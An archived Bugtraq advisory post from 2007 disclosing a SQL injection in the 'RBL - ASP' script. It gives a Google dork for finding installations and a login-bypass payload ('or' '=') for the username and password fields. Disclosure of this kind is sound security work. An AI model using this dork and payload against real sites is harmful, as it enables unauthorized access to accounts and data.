Bugtraq mailing list archives

RBL - ASP (scripts with db) SQL injection


From: sn0oPy.team () gmail com
Date: 29 Jan 2007 22:49:14 -0000

* RBL - ASP (scripts with db) SQL injection

* By : sn0oPy

* Risk : high

* Site : http://www.aspside.com

* Dork : intitle:"RBL - ASP"

* exploit :

user = 'or' '='
pass = 'or' '='


* contact : sn0oPy () avenir-geopolitique net

* greetz : [subzero], Avg Team(http://forums.avenir-geopolitique.net)

reference = http://forums.avenir-geopolitique.net/viewtopic.php?t=2607


Current thread: